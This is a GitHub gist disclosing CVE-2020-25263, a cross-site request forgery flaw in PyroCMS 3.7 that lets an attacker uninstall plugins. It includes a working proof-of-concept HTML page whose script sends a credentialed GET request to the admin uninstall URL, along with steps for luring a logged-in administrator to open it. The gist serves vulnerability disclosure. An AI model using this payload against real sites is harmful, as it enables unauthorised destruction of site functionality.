Skip to content

Instantly share code, notes, and snippets.

@farid007
Last active October 8, 2020 10:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save farid007/df51b0666643ec01d5571cbcc1e966e7 to your computer and use it in GitHub Desktop.
Save farid007/df51b0666643ec01d5571cbcc1e966e7 to your computer and use it in GitHub Desktop.
CSRF in PyroCMS which leads to deletion of plugins (CVE-2020-25263)
Product-: PyroCMS
CVE: CVE-2020-25263
Version: (,3.7) 3.7 Tested
Vulnerability-: Deletion of plugin via Cross-Site Request Forgery(CSRF).
Download-: https://github.com/pyrocms/pyrocms
Vulnerability Description-: The PyroCMS is vulnerable to cross-site request forgery (CSRF). Due to action is performed via GET request. An attacker can leverage this vulnerability by creating a page (which has malicious request) and host this page on his server and share this page to victims through social engineering methods. Once the victims who are already authenticated to the PyroCMS, click upon the page, unintended actions will be performed on the victim's behalf and the arbitrary plugin will be deleted.
Steps To Reproduce-:
Create a page with below content.
<!DOCTYPE>
<html>
<head>
<title></title>
<script type="text/javascript">
// to delete any plugin
var url = "http://test.com/admin/addons/uninstall/anomaly.module.blocks"
xhr = new XMLHttpRequest();
xhr.open("GET",url);
xhr.withCredentials = true;
xhr.send(null);
</script>
</head>
<body>
<--html content here --!>
</body>
</html>
* Send to the victim (who is authenticated in PyroCMS as administrator) and once the victim clicks on the page, the arbitrary plugin will be deleted.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment